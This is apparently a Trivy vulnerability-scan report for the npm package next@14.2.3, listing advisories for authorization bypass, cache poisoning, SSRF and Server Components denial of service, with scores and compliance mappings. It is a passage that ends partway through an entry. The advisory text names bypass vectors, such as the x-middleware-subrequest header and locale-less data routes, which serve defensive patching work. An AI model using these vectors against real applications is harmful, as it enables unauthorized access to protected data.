startLine: 0 message: 'nextjs: Authorization Bypass in Next.js Middleware' title: CVE-2025-29927 description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3. remediation: https://avd.aquasec.com/nvd/cve-2025-29927 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id024 - CWE-285 - CWE-863 raw: VulnerabilityID: CVE-2025-29927 VendorIDs: - GHSA-f82v-jwr5-mffw PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 13.5.9, 14.2.25, 15.2.3, 12.3.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-29927 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007 Title: 'nextjs: Authorization Bypass in Next.js Middleware' Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3. Severity: CRITICAL CweIDs: *id024 VendorSeverity: ghsa: 4 redhat: 4 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N V3Score: 9.1 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N V3Score: 9.1 References: - http://www.openwall.com/lists/oss-security/2025/03/23/3 - http://www.openwall.com/lists/oss-security/2025/03/23/4 - https://access.redhat.com/security/cve/CVE-2025-29927 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2 - https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48 - https://github.com/vercel/next.js/releases/tag/v12.3.5 - https://github.com/vercel/next.js/releases/tag/v13.5.9 - https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw - https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/ - https://nvd.nist.gov/vuln/detail/CVE-2025-29927 - https://security.netapp.com/advisory/ntap-20250328-0002 - https://security.netapp.com/advisory/ntap-20250328-0002/ - https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware - https://www.cve.org/CVERecord?id=CVE-2025-29927 PublishedDate: '2025-03-21T15:15:42.66Z' LastModifiedDate: '2025-09-10T15:49:40.637Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A01:2021 cweTop25_2024: - id: CWE-863 rank: 24 category: Authorization cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 100.0 epss: 0.92118 epss_percentile: 0.99719 is_kev: false kev_due_date: null components: severity_score: 10 epss_multiplier: 4.68472 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 805b9e4959b28bb7 ruleId: CVE-2024-46982 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js Cache Poisoning title: CVE-2024-46982 description: 'Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.' remediation: https://avd.aquasec.com/nvd/cve-2024-46982 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id025 - CWE-639 raw: VulnerabilityID: CVE-2024-46982 VendorIDs: - GHSA-gp8f-8m3g-qvj9 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 13.5.7, 14.2.10 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-46982 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084 Title: Next.js Cache Poisoning Description: 'Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.' Severity: HIGH CweIDs: *id025 VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N V3Score: 7.5 V40Score: 8.7 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3 - https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda - https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9 - https://nvd.nist.gov/vuln/detail/CVE-2024-46982 PublishedDate: '2024-09-17T22:15:02.273Z' LastModifiedDate: '2025-09-10T15:46:05.173Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A01:2021 cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 69.12453333333335 epss: 0.49062 epss_percentile: 0.97812 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 2.9624800000000002 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ea84684553ce61ab ruleId: CVE-2024-51479 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'next.js: next: authorization bypass in Next.js' title: CVE-2024-51479 description: 'Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application''s root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.' remediation: https://avd.aquasec.com/nvd/cve-2024-51479 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id026 - CWE-285 - CWE-863 raw: VulnerabilityID: CVE-2024-51479 VendorIDs: - GHSA-7gfc-8cq8-jh5f PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.15 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-51479 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55 Title: 'next.js: next: authorization bypass in Next.js' Description: 'Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application''s root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.' Severity: HIGH CweIDs: *id026 VendorSeverity: ghsa: 3 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N V3Score: 7.5 References: - https://access.redhat.com/security/cve/CVE-2024-51479 - https://github.com/vercel/next.js - https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b - https://github.com/vercel/next.js/releases/tag/v14.2.15 - https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f - https://nvd.nist.gov/vuln/detail/CVE-2024-51479 - https://www.cve.org/CVERecord?id=CVE-2024-51479 PublishedDate: '2024-12-17T19:15:06.697Z' LastModifiedDate: '2025-09-10T15:48:08.253Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A01:2021 cweTop25_2024: - id: CWE-863 rank: 24 category: Authorization cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 96.60839999999999 epss: 0.78509 epss_percentile: 0.99056 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 4.140359999999999 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 668e2a15050688ec ruleId: CVE-2026-44573 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n title: CVE-2026-44573 description: Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data//.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44573 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id027 - CWE-863 raw: VulnerabilityID: CVE-2026-44573 VendorIDs: - GHSA-36qx-fr4f-26g5 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44573 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d Title: Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n Description: Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data//.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: HIGH CweIDs: *id027 VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N V3Score: 7.5 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5 - https://nvd.nist.gov/vuln/detail/CVE-2026-44573 PublishedDate: '2026-05-13T17:16:22.627Z' LastModifiedDate: '2026-05-14T12:24:22.91Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A01:2021 cweTop25_2024: - id: CWE-863 rank: 24 category: Authorization cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.381866666666667 epss: 0.00052 epss_percentile: 0.1631 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00208 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6cbf7b1b47550df1 ruleId: CVE-2026-44578 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades title: CVE-2026-44578 description: Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5. remediation: https://avd.aquasec.com/nvd/cve-2026-44578 references: [] tags: - vulnerability - pkg:next@14.2.3 risk: cwe: &id028 - CWE-918 raw: VulnerabilityID: CVE-2026-44578 VendorIDs: - GHSA-c4j6-fc7j-m34r PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44578 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4 Title: Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades Description: Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5. Severity: HIGH CweIDs: *id028 VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N V3Score: 8.6 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/releases/tag/v15.5.16 - https://github.com/vercel/next.js/releases/tag/v16.2.5 - https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r - https://nvd.nist.gov/vuln/detail/CVE-2026-44578 PublishedDate: '2026-05-13T18:16:17.99Z' LastModifiedDate: '2026-05-14T18:34:38.53Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: owaspTop10_2021: - A10:2021 cweTop25_2024: - id: CWE-918 rank: 19 category: SSRF cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 27.510933333333334 epss: 0.04476 epss_percentile: 0.89216 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.17904 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 091bd6d2c4384d47 ruleId: GHSA-5j59-xgg2-r9c4 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up title: GHSA-5j59-xgg2-r9c4 description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\ \ in React Server Components was incomplete and did not fully mitigate denial-of-service\ \ conditions across all payload types. As a result, certain crafted inputs could\ \ still trigger excessive resource consumption. \n\nThis vulnerability affects\ \ React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle\ \ or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when\ \ using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\ \nA malicious actor can send a specially crafted HTTP request to a Server Function\ \ endpoint that, when deserialized, causes the React Server Components runtime\ \ to enter an infinite loop. This can lead to sustained CPU consumption and cause\ \ the affected server process to become unresponsive, resulting in a denial-of-service\ \ condition in unpatched environments." remediation: https://github.com/advisories/GHSA-5j59-xgg2-r9c4 references: [] tags: - vulnerability - pkg:next@14.2.3 raw: VulnerabilityID: GHSA-5j59-xgg2-r9c4 PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60, 16.0.10, 16.1.0-canary.19 Status: fixed SeveritySource: ghsa PrimaryURL: https://github.com/advisories/GHSA-5j59-xgg2-r9c4 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24 Title: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up Description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\ \ in React Server Components was incomplete and did not fully mitigate denial-of-service\ \ conditions across all payload types. As a result, certain crafted inputs\ \ could still trigger excessive resource consumption. \n\nThis vulnerability\ \ affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that\ \ bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and\ \ 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\ \nA malicious actor can send a specially crafted HTTP request to a Server Function\ \ endpoint that, when deserialized, causes the React Server Components runtime\ \ to enter an infinite loop. This can lead to sustained CPU consumption and\ \ cause the affected server process to become unresponsive, resulting in a denial-of-service\ \ condition in unpatched environments." Severity: HIGH VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4 - https://nextjs.org/blog/security-update-2025-12-11 - https://nvd.nist.gov/vuln/detail/CVE-2025-67779 - https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components - https://www.cve.org/CVERecord?id=CVE-2025-55184 - https://www.facebook.com/security/advisories/cve-2025-67779 PublishedDate: '2025-12-12T17:21:57Z' LastModifiedDate: '2026-01-15T21:55:04Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2dd16d93f72241ba ruleId: GHSA-8h8q-6873-q5fj severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js Vulnerable to Denial of Service with Server Components title: GHSA-8h8q-6873-q5fj description: "A vulnerability affects certain React Server Components packages for\ \ versions 19.x and frameworks that use the affected packages, including Next.js\ \ 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream\ \ as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\ \ \n\nA specially crafted HTTP request can be sent to any App Router Server Function\ \ endpoint that, when deserialized, may trigger excessive CPU usage. This can\ \ result in denial of service in unpatched environments." remediation: https://github.com/advisories/GHSA-8h8q-6873-q5fj references: [] tags: - vulnerability - pkg:next@14.2.3 raw: VulnerabilityID: GHSA-8h8q-6873-q5fj PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.5.16, 16.2.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://github.com/advisories/GHSA-8h8q-6873-q5fj DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529 Title: Next.js Vulnerable to Denial of Service with Server Components Description: "A vulnerability affects certain React Server Components packages\ \ for versions 19.x and frameworks that use the affected packages, including\ \ Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked\ \ upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\ \ \n\nA specially crafted HTTP request can be sent to any App Router Server\ \ Function endpoint that, when deserialized, may trigger excessive CPU usage.\ \ This can result in denial of service in unpatched environments." Severity: HIGH VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj - https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx - https://nvd.nist.gov/vuln/detail/CVE-2026-23870 PublishedDate: '2026-05-11T14:50:27Z' LastModifiedDate: '2026-05-11T14:50:27Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3cc6d1d18936ff7b ruleId: GHSA-h25m-26qc-wcjf severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components title: GHSA-h25m-26qc-wcjf description: 'A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg). A specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.' remediation: https://github.com/advisories/GHSA-h25m-26qc-wcjf references: [] tags: - vulnerability - pkg:next@14.2.3 raw: VulnerabilityID: GHSA-h25m-26qc-wcjf PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, 16.0.11, 16.1.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://github.com/advisories/GHSA-h25m-26qc-wcjf DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b Title: Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components Description: 'A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg). A specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.' Severity: HIGH VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf - https://nvd.nist.gov/vuln/detail/CVE-2026-23864 - https://vercel.com/changelog/summary-of-cve-2026-23864 PublishedDate: '2026-01-28T15:38:01Z' LastModifiedDate: '2026-01-28T15:38:01Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2384ada699a3c38e ruleId: GHSA-mwv6-3258-q52c severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next Vulnerable to Denial of Service with Server Components title: GHSA-mwv6-3258-q52c description: 'A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184). A malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.' remediation: https://github.com/advisories/GHSA-mwv6-3258-q52c references: [] tags: - vulnerability - pkg:next@14.2.3 raw: VulnerabilityID: GHSA-mwv6-3258-q52c PkgID: next@14.2.3 PkgName: next PkgIdentifier: PURL: pkg:npm/next@14.2.3 UID: 494c23d2c970c8b InstalledVersion: 14.2.3 FixedVersion: 14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59, 16.0.9, 16.1.0-canary.17 Status: fixed SeveritySource: ghsa PrimaryURL: https://github.com/advisories/GHSA-mwv6-3258-q52c DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a Title: Next Vulnerable to Denial of Service with Server Components Description: 'A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184). A malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.' Severity: HIGH VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/vercel/next.js - https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c - https://nextjs.org/blog/security-update-2025-12-11 - https://www.cve.org/CVERecord?id=CVE-2025-55184 PublishedDate: '2025-12-11T22:49:27Z' LastModifiedDate: '2025-12-11T22:49:28Z' context: sbom: name: next version: 14.2.3 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.333333333333336 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9076a243c95555c6 ruleId: GHSA-q4gf-8mx6-v5v3 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Next.js has a Denial of Service with Server Components title: GHSA-q4gf-8mx6-v5v3 description: 'A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869). A specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.' remediation: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3 references: [] tags: - vulnerability - pkg:next@14.2.3 raw: VulnerabilityID: GHSA-q4gf-8mx6-v5v3 PkgID: next@14.2.3 PkgName: next 